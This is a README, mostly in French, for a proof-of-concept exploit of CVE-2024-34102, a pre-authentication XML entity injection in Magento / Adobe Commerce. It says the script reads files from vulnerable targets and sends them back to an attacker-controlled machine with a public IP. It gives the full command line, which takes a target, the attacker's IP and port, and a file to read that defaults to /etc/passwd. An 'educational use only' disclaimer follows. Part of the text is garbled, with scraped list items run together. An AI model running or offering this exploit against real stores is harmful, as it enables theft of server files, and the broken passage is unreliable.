
POC for CVE-2024-34102. A pre-authentication XML entity injection issue in Magento / Adobe Commerce.
POC pour CVE-2024-34102. Un problème d'injection d'entité XML avant authentification dans Magento / Adobe Commerce.

Ce POC tentera de lire des fichiers à partir d'hôtes cibles vulnérables au récent CVE-2024-34102 de Magento / Adobe Commerce. Ce POC est basé sur cet avis de sécurité et cette recherche d'Assetnote.
Pour exécuter ce POC, vous devez disposer d'une machine avec une IP publiée et accessible.
poc.xml contenant les charges utiles principales./etc/passwd).requestsPour utiliser ce POC contre une seule cible :
python cve-2024-34102.py -u target -ip votre-ip-machine -p nimporte-quel-port-ouvert-sur-votre-machine -r fichier-à-lire-depuis-la-cible (par défaut /etc/passwd)
Pour toute suggestion ou réflexion, veuillez me contacter via moi.
Cet outil fourni est uniquement à des fins éducatives. Je n'encourage, n'approuve ni ne soutiens l'accès non autorisé à un système ou réseau. Utilisez cet outil de manière responsable et uniquement sur des systèmes pour lesquels vous avez une autorisation explicite de tester. Toute action et conséquence résultant d'une mauvaise utilisation de cet outil relèvent de votre propre responsabilité.